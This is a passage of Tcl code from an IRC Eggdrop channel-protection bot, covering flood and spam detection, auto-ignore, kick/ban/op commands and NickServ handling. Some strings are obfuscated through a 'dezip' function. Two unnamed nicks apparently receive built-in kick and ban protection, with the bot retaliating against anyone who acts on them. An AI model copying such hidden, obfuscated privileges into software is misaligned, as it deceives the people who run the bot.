LamE AnTIcIPaTEd [banmsg]" return 0 } } } #bind ctcr - PING ping_reply proc ping_reply {nick uhost hand dest key arg} { global pingchan botnick wait_ping notc catch { unset wait_ping } if {$nick == $botnick} { return 0 } set pingtime [expr [unixtime] - $arg] if {[info exists pingchan($nick)]} { puthlp "PRIVMSG $pingchan($nick) :$notc $nick PING Reply: $pingtime sec" unset pingchan($nick) } if {![matchattr $nick f]} { set hostmask "${nick}!*@*" putlog "!Log! 1 minutes auto ignore to $hostmask" newignore $hostmask $botnick "*" 1 } return 0 } proc pub_reset {nick uhost hand chan rest} { global notc putsrv "NOTICE $nick :$notc !ReSeT!" auto_ping "0" "0" "0" "0" "0" ident_it } proc pub_pong {nick uhost hand chan rest} { global pingchan putsrv "PRIVMSG $nick :\001PING [unixtime]\001" set pingchan($nick) $chan return 0 } proc pub_auth {nick uhost hand chan rest} { global botnick notc set cmd [string tolower [lindex $rest 0]] set ch [passwdok $nick ""] if {$ch == 1} { puthlp "NOTICE $nick :$notc No password set. Usage: pass <password>" return 0 } if {[matchattr $nick Q]} { puthlp "PRIVMSG $chan : 12� W � hat! ${nick} , 13� C � all 4� M � e " } if {![matchattr $nick Q]} { puthlp "PRIVMSG $chan :${nick}, No" } } proc notc_prot {nick uhost hand text {dest ""}} { global notc botnick notc_chn bannick notm quick ismaskhost is_m if {$dest != "" && $dest != $botnick} { if {[string index $dest 0] == "+" || [string index $dest 0] == "@"} { foreach x [channels] { set x [string tolower $x] if {[string match "*$x*" [string tolower $dest]]} {
set dest $x break } } } if {[isop $botnick $dest]} { if {[string match "*-greet*" [channel info $dest]]} { return 0 } if {$nick == "ChanServ"} { return 0 } if {$nick == $botnick} { return 0 } if {[matchattr $nick f]} { return 0 } if {[isop $nick $dest]} { return 0 } if {[isutimer "set_-m $dest"]} { return 0 } set banmask "*!*[string range $uhost [string first "@" $uhost] end]" set bannick($nick) $banmask if {[info exists notc_chn($dest)]} { incr notc_chn($dest) } { set notc_chn($dest) 1 } if {$notc_chn($dest) == 1} { putsrv "KICK $dest $nick :$notc 1ABusINg 4NoTIcE 1 @ps OnLY [banmsg]" } elseif {$notc_chn($dest) == 2} { if {$quick == "1" && ![info exists is_m($dest)]} { putqck "KICK $dest $nick :$notm 1TwIcE 4NoTIcE 1 ABusEd [banmsg]" } { putsrv "KICK $dest $nick :$notm 1TwIcE 4NoTIcE 1 ABusEd [banmsg]" } } elseif {$notc_chn($dest) >= 3} { if {[info exists ismaskhost]} { set bannick($nick) [maskhost $banmask] } if {$quick == "1" && ![info exists is_m($dest)]} { putqck "KICK $dest $nick :$notm 1tO mUcH 4vIoLencE 1 FRoM THIS I.S.P 4@uT. 1 !!" } { putsrv "KICK $dest $nick :$notm 1tO mUcH 4vIoLencE 1 FRoM THIS I.S.P 4@uT. 1 !!" } } return 0 } repeat_pubm $nick $uhost $hand $dest $text } { msg_prot $nick $uhost $hand $text } } proc setignore {mask reason time} { global quick foreach x [ignorelist] { if {[lindex $x 0] == $mask} { return 0 } } newignore $mask "IgN" $reason 15 if {$quick == "1"} { putquick "silence +$mask" } { putserv "silence +$mask" } utimer $time [list unsetignore $mask]
} proc unsetignore {mask} { if {![isignore $mask]} { return 0 } putserv "silence -$mask" killignore $mask } set massmsg 0 proc msg_prot {unick uhost hand text} { global nick botnick invme own nickpass altpass notc notb notd virus_nick ex_flood vern global altnick twice_msg version bannick massmsg keep-nick badwords quick is_m ismaskhost global querym set querymsg [lindex $querym [rand [llength $querym]]] regsub -all -- [dezip "jG~BDx04ntxb0"] $text "" text msg_Z $unick $uhost $hand $text set real $text set text [uncolor $text] if {$unick == $botnick} { return 0 } if {[string match "*dcc send*" [string tolower $text]] && ![string match "*Serv*" $unick] && ![matchattr $unick f]} { set virus_nick $unick foreach x [channels] { if {[onchan $virus_nick $x] && ![matchattr $virus_nick f] && ![isop $virus_nick $x]} { if {[isop $botnick $x]} { set host [getchanhost $virus_nick $x] set host "*!*@[lindex [split $host @] 1]" set bannick($virus_nick) $host putsrv "KICK $x $virus_nick :$notc 4!SpaM! 1 I HaTE 4VIRuZ [banms]" set virus_nick "" } else { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { set sendspam "!kick [zip "$x $unick $notc 4!SpaM! 1 FRoM 4@[lindex [split [getchanhost $virus_nick $x] @] 1] 1 ViRuZ [banmsg]"]" putsrv "PRIVMSG $c :$sendspam" return 0 } } } } } return 0 } if {$unick == "ChanServ"} { if {[string match "*You do not have access to op people on*" $text] && [getuser "config" XTRA "MUSTOP"] != "" && $botnick == $nick} { set partchn [lindex $text 9] set partchn [string range $partchn 0 [expr [string length $partchn]-2]] if {[string match "*-secret*" [channel info $partchn]]} { putsrv "PART $partchn :(((( @ p G ua R d))))" channel remove $partchn savechan } } if {[string match "*is not on*" $text]} {
set text [string tolower $text] foreach x [channels] { set x [string tolower $x] set cflag "c$x" set cflag [string range $cflag 0 8] if {[string match "*$x*" $text]} { if {![string match "*c*" [getchanmode $x]]} { putsrv "PART $x : 1Naik Jadi �(� 4@ 1�)�ps status" } { putsrv "PART $x : 1Naik Jadi �(�@�)�ps status" } if {[matchattr $cflag K]} { puthlp "JOIN $x :[dezip [getuser $cflag XTRA "CI"]]" } { puthlp "JOIN $x" } } } return 0 } if {[string match "*AOP:*SOP:*AKICK*" $text]} { foreach errchan [channels] { set cflag "c$errchan" set cflag [string range $cflag 0 8] if {[string match "*[string tolower $errchan] *" [string tolower $text]]} { if {![isop $botnick $errchan]} { timer 1 { putlog "resync" } if {![string match "*c*" [getchanmode $errchan]]} { putsrv "PART $errchan : 1regained �(� 4@ 1�)�ps status" } { putsrv "PART $errchan :regained �(�@�)�ps status" } if {[matchattr $cflag K]} { puthlp "JOIN $errchan :[dezip [getuser $cflag XTRA "CI"]]" } { puthlp "JOIN $errchan" } } return 0 } } } return 0 } if {$unick == "NickServ"} { if {[string match "*nick is owned*" [string tolower $text]]} { putlog "!Log! IDeNTIFY" catch { clearqueue all } if {$botnick == $nick && $nickpass != ""} { putsrv "NickServ identify $nickpass" } if {$botnick == $altnick && $altpass != ""} { putsrv "NickServ identify $altpass" } } if {[string match "*Password accepted for*" $text]} { auto_reop } if {[string match "*The nick $nick is not registered*" $text] && $nickpass != ""} {
if {[getuser "config" XTRA "EMAIL"] != ""} { putsrv "NickServ register $nickpass [getuser "config" XTRA "EMAIL"]" } } if {[string match "*The nick $nick has been temporarily registered to you*" $text]} { putsrv "NickServ identify $nickpass" } return 0 } if {$unick == "MemoServ"} { if {[string match "*New DALnet news is available*" $text]} { putsrv "PRIVMSG [email protected] :NEWS" } return 0 } if {[string match "!kick*" [string tolower $text]]} { set salls [dezip [lrange $text 1 end]] set schan [lindex $salls 0] set snick [lindex $salls 1] set sreas [lrange $salls 2 end] if {![isop $botnick $schan] || [matchattr $snick f] || ![onchan $snick $schan]} { return 0 } set banhost [getchanhost $snick $schan] set banhost "*!*@[lindex [split $banhost @] 1]" set bannick($snick) $banhost regsub -all -- [dezip "bF~uC0.JqaEc0"] $sreas "" sreas regsub -all -- [dezip "xdxs~F1hBM6q0"] $sreas "" sreas putsrv "KICK $schan $snick :$sreas" return 0 } if {[string match "*auth*" $text] || [string match "*[string tolower $notb]*" [string tolower $text]]} { return 0 } if {[matchattr $hand f]} { return 0 } set mhost [string range $uhost [string first "@" $uhost] end] if {![isutimer "MSGCOUNTER"]} { utimer 20 { putlog "MSGCOUNTER" } set massmsg 1 } { set massmsg [incr massmsg] if {[string length $text] > 100} { set massmsg [incr massmsg] } if {$massmsg >= 5} { set massmsg 0 set mhost [string range $uhost [string first "@" $uhost] end] setignore "*!*@*" "*" 120 if {[info exists ismaskhost]} { setignore [maskhost "*!*$mhost"] "MaZz MSg" 300 } { setignore "*!*$mhost" "MaZz MSg" 300 } foreach iamop [channels] { if {[isop $botnick $iamop]} { if {[string match "*c*" [getchanmode $iamop]]} { puthlp "PRIVMSG $iamop :\001ACTION IncOmINg MaZz MSg..! LasT FRoM [unsix "$unick! $uhost"]\001" } {
puthlp "PRIVMSG $iamop :\001ACTION IncOmINg MaZz MSg..! LasT FRoM 1[unsix "$unick!$uhost"]\001" } foreach c [chanlist $iamop] { set nickhost [string range [getchanhost $c $iamop] [string first "@" [getchanhost $c $iamop]] end] if {$nickhost == $mhost && ![matchattr $c f]} { if {$c == $botnick} { return 0 } set bannick($c) "*!*$mhost" putsrv "KICK $iamop $c :$notc 1Heavy 4FLoOd 1 MSg FRoM 4$mhost [banms]" break } } } } return 0 } } if {[string match "*decode*" [string tolower $text]]} { foreach x [channels] { if {[onchan $unick $x]} { if {[isop $botnick $x]} { set bannick($unick) "*!*$mhost" putsrv "KICK $x $unick :$notc 4!SpaM! 1 I HaTE 4dEcOdE [banms]" return 0 } { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { set sendspam "!kick [zip "$x $unick $notc 4!SpaM! 1 FRoM 4[string range $uhost [string first "@" $uhost] end] 1 dEcOdE [banmsg]"]" putsrv "PRIVMSG $c :$sendspam" return 0 } } } } } set invme($mhost) "dEcOdE" } if {[string match "*#*" $text] || [string match "*/j*" $text]} { foreach x [channels] { set chksiton [string tolower $x] if {[string match "*$chksiton*" [string tolower $text]]} { return 0 } } foreach x [channels] { if {[onchan $unick $x]} { if {[isop $botnick $x]} { set banmask "*!*[string range $uhost [string first "@" $uhost] end]" set bannick($unick) $banmask putsrv "KICK $x $unick :$notc 4!SpaM! 1 I HaTE 4InvITeR [banms]" return 0 } { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { set sendspam "!kick [zip "$x $unick $notc 4!SpaM! 1 FRoM 4[string range $uhost [string first "@" $uhost] end] 1 InvITE [banmsg]"]"
putsrv "PRIVMSG $c :$sendspam" return 0 } } } } { set banmask "[string range $uhost [string first "@" $uhost] end]" if {$banmask != "*!*@*" && $banmask != "*"} { foreach c [chanlist $x] { set nickhost "[string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end]" if {$banmask == $nickhost} { if {[matchattr $c f]} { return 0 } if {$c != $botnick} { if {[isop $botnick $x]} { set bannick($c) $banmask set mhost [string range $uhost [string first "@" $uhost] end] putsrv "KICK $x $c :$notc 4!SpaM! 1 InvITeR 4ReLaY 1 FRoM 4$unick 1 IP 4$mhost [banms]" } { set members [chanlist $x f] foreach s $members { if {[isop $s $x]} { set mhost [string range $uhost [string first "@" $uhost] end] set sendspam "!kick [zip "$x $c $notc 4!SpaM! 1 InvITeR 4ReLaY 1 FRoM 4$unick 1 IP 4$mhost [banms]"]" putsrv "PRIVMSG $s :$sendspam" break } } } return 0 } } } } } } set invme($mhost) "InvITE" return 0 } if {[string match "*http:/*" [string tolower $text]] || [string match "*www.*" [string tolower $text]]} { foreach x [channels] { if {[onchan $unick $x]} { if {[isop $botnick $x]} { set banmask "*!*[string range $uhost [string first "@" $uhost] end]" set bannick($unick) $banmask putsrv "KICK $x $unick :$notc 4!SpaM! 1 I HaTE 4AdvERTIsE [banms]" return 0 } else { set members [chanlist $x f] foreach c $members { if {[isop $c $x]} { set sendspam "!kick [zip "$x $unick $notc 4!SpaM! 1 FRoM 4[string range $uhost [string first "@" $uhost] end] 1 AdvERTIsE [banmsg]"]"
putsrv "PRIVMSG $c :$sendspam" return 0 } } } } { set banmask "[string range $uhost [string first "@" $uhost] end]" if {$banmask != "*!*@*" && $banmask != "*"} { foreach c [chanlist $x] { set nickhost "[string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end]" if {$banmask == $nickhost} { if {[matchattr $c f]} { return 0 } if {$c != $botnick} { if {[isop $botnick $x]} { set bannick($c) $banmask set mhost [string range $uhost [string first "@" $uhost] end] putsrv "KICK $x $c :$notc 4!SpaM! 1 AdvERTIsE 4ReLaY 1 FRoM 4$unick 1 IP 4$mhost [banms]" } { set members [chanlist $x f] foreach s $members { if {[isop $s $x]} { set mhost [string range $uhost [string first "@" $uhost] end] set sendspam "!kick [zip "$x $c $notc 4!SpaM! 1 AdvERTIsE 4ReLaY 1 FRoM 4$unick 1 IP 4$mhost [banms]"]" putsrv "PRIVMSG $s :$sendspam" return 0 } } } return 0 } } } } } } set invme($mhost) "AdvERTIsE" return 0 } set mhost [string range $uhost [string first "@" $uhost] end] if {[string length $text] > 100} { set chr 0 set cnt 0 while {$cnt < [string length $real]} { if [isflood [string index $real $cnt]] { incr chr } incr cnt } if {$chr > 30} { setignore "*!*@*" "*" 120 if {[info exists ismaskhost]} { setignore [maskhost "*!*$mhost"] "TsunamI MSg" 300 } {
setignore "*!*$mhost" "TsunamI MSg" 300 } foreach x [channels] { if {[isop $botnick $x]} { if {[string match "*c*" [getchanmode $x]]} { puthlp "PRIVMSG $x :\001ACTION IncOmINg TsunamI MSg..! FRoM [unsix "$unick! $uhost"]\001" } { puthlp "PRIVMSG $x :\001ACTION IncOmINg TsunamI MSg..! FRoM 1[unsix "$unick! $uhost"]\001" } foreach c [chanlist $x] { set nickhost [string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end] if {$nickhost == $mhost} { if {[matchattr $c f] || $c == $botnick} { return 0 } set bannick($c) "*!*$mhost" putsrv "KICK $x $c :$notc 4TsunamI 1 MSg FRoM 4$mhost [banms]" break } } } } return 0 } } foreach badword [string tolower $badwords] { if {[string match *$badword* [string tolower $text]]} { foreach x [channels] { if {[onchan $unick $x]} { if {[isop $unick $x] || [isvoice $unick $x]} { return 0 } if {[isop $botnick $x]} { set bannick($unick) "*!*$mhost" putsrv "KICK $x $unick :$notc 4BaDWoRD 1 MSg FRoM 4$mhost 1 MaTcH FRoM 4[string toupper $badword] [banms]" return 0 } { foreach s [chanlist $x f] { if {[isop $s $x]} { set sendspam "!kick [zip "$x $unick $notc 4BaDWoRD 1 MSg FRoM 4$mhost 1 MaTcH FRoM 4[string toupper $badword] [banms]"]" putsrv "PRIVMSG $s :$sendspam" } } } } } } } if {[string length $text] > 200} { if {![isutimer "LONGTEXT"]} { utimer 30 { putlog "LONGTEXT" } setignore "*!*@*" "*" 120 if {[info exists ismaskhost]} { setignore [maskhost "*!*$mhost"] "LoNg TexT MSg" 300 } {
setignore "*!*$mhost" "LoNg TexT MSg" 300 } } foreach x [channels] { if {[isop $botnick $x]} { if {[string match "*c*" [getchanmode $x]]} { puthlp "PRIVMSG $x :\001ACTION IncOmINg LoNg TexT MSg..! FRoM [unsix "$unick! $uhost"]\001" } { puthlp "PRIVMSG $x :\001ACTION IncOmINg LoNg TexT MSg..! FRoM 1[unsix "$unick! $uhost"]\001" } foreach c [chanlist $x] { set nickhost [string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end] if {$nickhost == $mhost} { if {[matchattr $c f] || $c == $botnick} { return 0 } set bannick($c) "*!*$mhost" putsrv "KICK $x $c :$notc 1LoNg TexT MSg FRoM 4$mhost [banms]" break } } } { foreach c [chanlist $x] { set nickhost [string range [getchanhost $c $x] [string first "@" [getchanhost $c $x]] end] if {$nickhost == $mhost} { if {[matchattr $c f] || $c == $botnick} { return 0 } foreach s [chanlist $x f] { if {[isop $s $x]} { set sendspam "!kick [zip "$x $c $notc 1LoNg TexT MSg FRoM 4$mhost [banms]"]" putsrv "PRIVMSG $s :$sendspam" break } } } } } } return 1 } if {$unick != $own} { if {[info exists twice_msg($unick)]} { set hostmask "${unick}!*@*" puthlp "PRIVMSG $unick :$querymsg" putlog "!Log! IgNORE <<$hostmask>> PV-msg" unset twice_msg($unick) newignore $hostmask $unick "*" 2 } { if {[istimer "chkautomsg"]} { set invme($mhost) "AuToJoIN MSg" return 0 } if {[isutimer "NO REPLY"]} { foreach x [utimers] { if {[string match "*NO REPLY*" $x]} {
killutimer [lindex $x 2] } } utimer 10 { putlog "NO REPLY" } return 0 } utimer 10 { putlog "NO REPLY" } if {[string match "*dal*et*" $uhost]} { puthlp "PRIVMSG $unick :$querymsg" } { if {[getuser "config" XTRA "AWAY"]!=""} { puthlp "PRIVMSG $unick :$querymsg" } { puthlp "PRIVMSG $unick :$querymsg" } set twice_msg($unick) 1 } } } } proc auto_reop {} { global notc botnick foreach x [channels] { if {[onchan $botnick $x]} { if {![isop $botnick $x] && [string tolower $x] != [dezip "BKGW.1s0d06/"]} { if {![string match "*+protectfriends*" [channel info $x]]} { set cret 30 foreach ct [utimers] { if {[string match "*chancnt*" $ct]} { if {[expr [lindex $ct 0] + 30] > $cret} { set cret [expr [lindex $ct 0] + 30] } } } utimer $cret [list chancnt $x] } } } } return 0 } proc chancnt {chan} { if {[isutimer "chancnt $chan"]} { return 0 } putsrv "ChanServ count $chan" } proc msg_kick {nick uhost hand rest} { global notc botnick own set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] set reason [lrange $rest 2 end] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: kick <#chan> " return 0 }
if {[isop $botnick $chantarget]!=1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." return 0 } if {$nicktarget == $botnick} { puthlp "NOTICE $nick :$notc I cant self kick." return 0 } if {[matchattr $nicktarget n] && ![matchattr $nick Z]} { puthlp "NOTICE $nick :$notc I CaNT KIcK MY Admin." return 0 } if {$reason == ""} { set reason " 1ReQuesT..!" if {[matchattr $nick n]} { set reason " 1Admin 4KIcK 1 ReQuesT 4..!" } if {[matchattr $nick m] && ![matchattr $nick n]} { set reason " 1MasTeR 4KIcK 1 ReQuesT 4..!" } } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { putsrv "KICK $x $nicktarget :$notc $reason" return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } proc msg_kickban {nick uhost hand rest} { global notc botnick own bannick set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] set bmask [getchanhost $nicktarget $chantarget] set bmask "*!*@[lindex [split $bmask @] 1]" set reason [lrange $rest 2 end] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: kickban <#chan> " return 0 } if {[isop $botnick $chantarget]!=1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." return 0 } if {$nicktarget == $botnick} { puthlp "NOTICE $nick :$notc I cant self kick."
return 0 } if {[matchattr $nicktarget n] && ![matchattr $nick Z]} { puthlp "NOTICE $nick :$notc I cant kickban my Admin." return 0 } if {$reason == ""} { set reason " 1KIcKBaN ReQuesT 4..!" if {[matchattr $nick m]} { set reason " 1MasTeR 4KIcKBaN 1 ReQuesT [banmsg]" } if {[matchattr $nick n]} { set reason " 1Admin 4KIcKBaN 1 ReQuesT [banmsg]" } } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { set bannick($nicktarget) $bmask putsrv "KICK $x $nicktarget :$notc $reason" return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } proc msg_op {nick uhost hand rest} { global notc botnick set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: op <#chan> " return 0 } if {[isop $botnick $chantarget]!=1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." return 0 } if {[isop $nicktarget $chantarget]!=0} { puthlp "NOTICE $nick :$notc $nicktarget is already op on CHaNNEL $chantarget" return 0 } foreach x [channels] { if {[string tolower $x] == [string tolower $chantarget]} { opq $x $nicktarget return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } proc msg_voice {nick uhost hand rest} { global notc botnick
set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: voice <#chan> " return 0 } if {[isop $botnick $chantarget]!=1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." return 0 } if {[isvoice $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is already voice on channel $chantarget" } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { putserv "mode $x +v $nicktarget" return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } proc msg_deop {nick uhost hand rest} { global notc botnick own set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: deop <#chan> " return 0 } if {[isop $botnick $chantarget] != 1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." return 0 } if {![isop $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $chantarget is not op on CHaNNEL $chantarget" return 0 } if {$nicktarget == $botnick} { puthlp "NOTICE $nick :$notc I CaNT SeLF DEoP!" return 0 } if {[matchattr $nicktarget n]} {
puthlp "NOTICE $nick :$notc I cant deop my Owner." return 0 } if {[matchattr $nick m]} { set mreq " 4MasTeR.ReQuesT " } if {[matchattr $nick n]} { set mreq " 4Admin.ReQuesT " } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { if {![string match "*k*" [getchanmode $x]]} { putserv "mode $x -ko $mreq $nicktarget" } { putserv "mode $x -o $nicktarget" } return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } proc msg_devoice {nick uhost hand rest} { global notc botnick owner set chantarget [lindex $rest 0] set nicktarget [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($chantarget == "") || ($nicktarget == "")} { puthlp "NOTICE $nick :$notc Usage: devoice <#chan> " return 0 } if {[isop $botnick $chantarget]!=1} { puthlp "NOTICE $nick :$notc NoT OP CHaNNEL $chantarget" return 0 } if {![onchan $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not on the channel." } if {![isvoice $nicktarget $chantarget]} { puthlp "NOTICE $nick :$notc $nicktarget is not voice on CHaNNEL $chantarget" } if {$nicktarget == $owner} { puthlp "NOTICE $nick :$notc I cant devoice my owner." return 0 } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { putserv "mode $x -v $nicktarget" return 0 } } puthlp "NOTICE $nick :$notc NoT IN $chantarget" } bind kick - * prot:kick proc prot:kick {nick uhost handle chan knick reason} { global notc notd botnick ps kickme notb notm bannick igflood botname quick is_m
op_it is_ban iskick set cflag "c$chan" set cflag [string range $cflag 0 8] if {[string match "* *" $reason] || [string match "*$notm*" $reason]} { set igflood($nick) "1" } if {[info exists iskick($knick$chan)]} { unset iskick($knick$chan) } if {$nick == $botnick} { if {[info exists kickme($knick)]} { if {$kickme($knick) == 1} { set kickme($knick) 2 } if {$kickme($knick) == 3} { catch { unset kickme($knick) } } } if {[string match "*$notm*" $reason]} { if {![info exists bannick($knick)]} { return 0 } if {[info exists is_ban($bannick($knick)$chan)]} { return 0 } set is_ban($bannick($knick)$chan) 1 if {$bannick($knick) == "*!*@*"} { return 0 } set cmode [getchanmode $chan] set ok_m "1" if {[info exists is_m($chan)]} { set ok_m "0" } if {[isutimer "set_-m $chan"]} { set ok_m "0" } if {[string match "*m*" $cmode]} { set ok_m "0" } if {$ok_m == "1"} { set is_m($chan) 1 if {$quick == "1"} { putquick "mode $chan +b $bannick($knick)" } { putserv "mode $chan +b $bannick($knick)" } } { if {$quick == "1"} { putquick "mode $chan +b $bannick($knick)" } { putserv "mode $chan +b $bannick($knick)" } } return 0 } { if {![info exists bannick($knick)]} { return 0 } if {$bannick($knick) == "*!*@*"} { return 0 } putserv "mode $chan +b $bannick($knick)" if {[string match "* 4BaNNEd 1: 3 MINUTES*" $reason]} { utimer 180 [list unbanq $chan $bannick($knick)] } } return 0 }
if {$nick == $knick} { return 0 } if {$nick == "ChanServ"} { return 0 } if {[matchattr $nick f]} { return 0 } if {[string match "* *" $reason] || [string match "*$notm*" $reason]} { return 0 } if {$knick == $botnick} { if {[info exists kickme($nick)]} { set kickme($nick) 3 if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ deop $chan $nick" } } { if {[matchattr $cflag D]} { set kickme($nick) 1 } } puthlp "JOIN $chan" return 0 } if {![isop $botnick $chan]} { return 0 } if {$knick == $notb} { putserv "KICK $chan $nick :$notc 1DonT KIcK 4$notb 1..!" set op_it($knick) 1 return 0 } if {$knick == $ps} { putserv "KICK $chan $nick :$notc 1DonT KIcK 4$ps 1..!" set op_it($knick) 1 return 0 } if {[matchattr $knick n]} { putsrv "KICK $chan $nick :$notc 1Admin 4KIcK 1 PRoTecTIoN 4..!" set op_it($knick) 1 return 0 } if {[matchattr $knick m]} { putsrv "KICK $chan $nick :$notc 1MasTeR 4KIcK 1 PRoTecTIoN 4..!" set op_it($knick) 1 return 0 } } proc unbanq {chan host} { global botnick if {[isop $botnick $chan]} { puthelp "mode $chan -b $host" } } set banidx 1 proc banmsg {} { global banidx bancounter set banidx [incr banidx] if {$banidx >= [llength $bancounter]} { set banidx 1 } set banmsg [lindex $bancounter $banidx] } proc banms {} { global banidx bancounte
set banidx [incr banidx] if {$banidx >= [llength $bancounte]} { set banidx 1 } set banms [lindex $bancounte $banidx] } proc ban_chk {nick uhost handle channel mchange bhost} { global botnick botname ps quick notb notc bannick ban-time igflood invme ex_flood set mhost [string range $bhost [string first "@" $bhost] end] set cflag "c$channel" set cflag [string range $cflag 0 8] if {[info exists invme($mhost)]} { catch { unset invme($mhost) } } if {[info exists ex_flood($mhost)]} { catch { unset ex_flood($mhost) } } if {![isop $botnick $channel]} { return 0 } set banmask "*!*[string range $uhost [string first "@" $uhost] end]" if {$banmask == "*!*@*"} { set banmask "$nick!*@*" } if {$bhost == "*!*@*"} { utimer [rand 4] [list unbanq $channel $bhost] return 1 } set cmode [getchanmode $channel] if {[getuser "config" XTRA "IPG"] != ""} { foreach ipg [getuser "config" XTRA "IPG"] { if {[string match $ipg $bhost] || [string match $bhost $ipg]} { if {![isutimer "IPG $bhost"]} { if {![string match "*k*" $cmode]} { puthelp "mode $channel -kb 4IpgUaRd $bhost" } { puthelp "mode $channel -b $bhost" } utimer 60 [list putlog "IPG $bhost"] } return 1 } } } if {[string match [string tolower $bhost] [string tolower $botname]]} { if {![matchattr $nick f] && $nick != $botnick && $nick != "ChanServ" && ![string match "*dal.net*" $nick] && ![info exists igflood($nick)]} { if {[matchattr $cflag D]} { if {$quick == "1"} { putqck "KICK $channel $nick :$notc 1SeLF 4BaNNINg 1 DeFeNsE REvERsINg [banmsg]" } { putsrv "KICK $channel $nick :$notc 1SeLF 4BaNNINg 1 DeFeNsE REvERsINg [banmsg]" } } if {![string match "*k*" $cmode]} { if {$quick == "1"} { putquick "mode $channel -kb+b 4SeLF.UnBaN $bhost $banmask" } { putserv "mode $channel -kb+b 4SeLF.UnBaN $bhost $banmask" }
} { if {$quick == "1"} { putquick "mode $channel -b+b $bhost $banmask" } { putserv "mode $channel -b+b $bhost $banmask" } } } { if {![string match "*k*" $cmode]} { if {$quick == "1"} { putquick "mode $channel -kb 4SeLF.UnBaN $bhost" } else { putserv "mode $channel -kb SeLF.UnBaN $bhost" } } { if {$quick == "1"} { putquick "mode $channel -b $bhost" } else { putserv "mode $channel -b $bhost" } } } return 1 } foreach knick [chanlist $channel] { if {[string match [string tolower $bhost] [string tolower $knick![getchanhost $knick $channel]]]} { if {[matchattr $knick f]} { if {$knick != $ps && $knick != $notb} { utimer [rand 4] [list unbanq $channel $bhost] } if {[matchattr $nick f] || $nick == $botnick || $nick == "ChanServ" || [string match "*dal.net*" $nick] || [info exists igflood($nick)]} { return 1 } } if {$knick == $notb} { if {$nick != $botnick} { putsrv "KICK $channel $nick :$notc 1DonT BaNnEd 4$notb 1..!" if {![string match "*k*" $cmode]} { putserv "mode $channel -kb 4$notb.GuaRd $bhost" } { putserv "mode $channel -b $bhost" } } { putserv "mode $channel -b $bhost" } return 1 } if {$knick == $ps} { if {$nick != $botnick} { putsrv "KICK $channel $nick :$notc 1DonT BaNnEd 4$ps 1..!" if {![string match "*k*" $cmode]} { putserv "mode $channel -kb 4$ps.GuaRd $bhost" } { putserv "mode $channel -b $bhost" } } { putserv "mode $channel -b $bhost" } return 1
